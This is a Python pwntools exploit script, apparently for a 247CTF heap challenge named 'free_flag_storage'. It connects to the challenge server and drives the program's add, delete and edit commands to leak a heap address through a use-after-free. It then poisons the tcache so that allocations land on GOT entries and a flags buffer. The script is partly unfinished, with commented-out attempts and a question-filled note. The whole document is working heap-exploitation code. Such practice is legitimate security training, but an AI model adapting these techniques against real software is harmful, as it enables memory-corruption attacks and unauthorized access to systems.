#!/usr/bin/env python3
from sys import flags
from pwn import *
import ctypes
from Crypto.Util.number import long_to_bytes
exe = ELF("./free_flag_storage_patched")
libc = ELF("./libc6-i386_2.27-3ubuntu1_amd64.so")
ld = ELF("./ld-2.27.so")

context.binary = exe
context.terminal = ["tmux", "splitw", "-vf","-p", "70"]
#context.terminal = ['gnome-terminal','-x']
context.log_level = "debug"
def conn():
    if args.LOCAL:
        # b = add, delete, edit
        # 0x9da0170, 0x9da01b0
    	r = gdb.debug(exe.path,gdbscript='''
            b *0x8048803 
            b *0x8048cc1
            b *0x8048a31
            b *0x8048b02
            b *0x8048a6b 
            ''')
    elif args.PROCESS:
        r = process([exe.path])
    else:
        r = remote("0844b7b94621d805.247ctf.com", 50002)

    return r


def add(r, len, value, id, score):
    r.sendline(b'add')
    r.sendlineafter(b': ',len)
    r.sendlineafter(b'value:',value)
    r.sendlineafter(b'challenge_id: ',id)
    r.sendlineafter(b'score: ',score)
    
    
def delete(r, idx):
    r.sendline(b'delete')
    r.sendlineafter(b'to delete:',f'{idx}')

def edit(r, idx, value, id, score):
    r.sendline(b'edit')
    r.sendlineafter(b'edit:',f"{idx}")
    r.sendlineafter(b'):',value)
    r.sendlineafter(b'challenge_id: ',id)
    r.sendlineafter(b'score:',score)

def main():
    r = conn()
    

    # max size = 32
    puts_got = p32(exe.got.puts)
    atoi = p32(exe.got.atoi)
    flags_buffer = p32(0x804b04c)
    # good luck pwning :)
    add(r,"20","0","0","0")
    
    add(r,"20","0","0","0")

    delete(r,0)
    # on edit max size: heap leak of first chunk freed
    #edit(r,0,flags_buffer,flags_buffer,flags_buffer) # arbitrary address is in tcache!!

    r.sendline(b'edit')
    r.sendlineafter(b'edit:',"0")
    r.recvuntil(b'max size ')
    leak = eval(r.recvuntil(b')').decode()[:-1])
    info(hex(leak))

    leak = p32(leak)
    info(f"HEAP LEAK: {leak}")
    
    r.sendlineafter(b':',leak)
    r.sendlineafter(b'challenge_id: ',leak)
    r.sendlineafter(b'score:',leak)
   # add, delete(1) -> flag[0] ha l'indirizzo dell'heap? what?
   # then: add, size = next addr in tcache??????
    add(r,"20",puts_got,puts_got,puts_got)
    delete(r,1)
    add(r,"20",flags_buffer,flags_buffer,flags_buffer)



    '''
    add(r,flags_buffer,flags_buffer,flags_buffer,flags_buffer)
    edit(r,0,flags_buffer,flags_buffer,flags_buffer)
    add(r,puts_got,puts_got,puts_got,puts_got)
    edit(r,1,flags_buffer,flags_buffer,flags_buffer)
    r.interactive()
    r.sendline(b'edit')
    r.sendlineafter(b'edit:',"0")
    r.recvuntil(b'max size ')
    leak = eval(r.recvuntil(b')').decode()[:-1])
    info(hex(leak))

    leak = p32(leak)
    info(f"HEAP LEAK: {leak}")
    
    r.sendlineafter(b':',leak)
    r.sendlineafter(b'challenge_id: ',leak)
    r.sendlineafter(b'score:',leak)
    

    #add(r,"20",leak,leak,leak)
    #add(r,"20",puts_got,puts_got,puts_got)
    '''
    r.interactive()

if __name__ == "__main__":
    main()
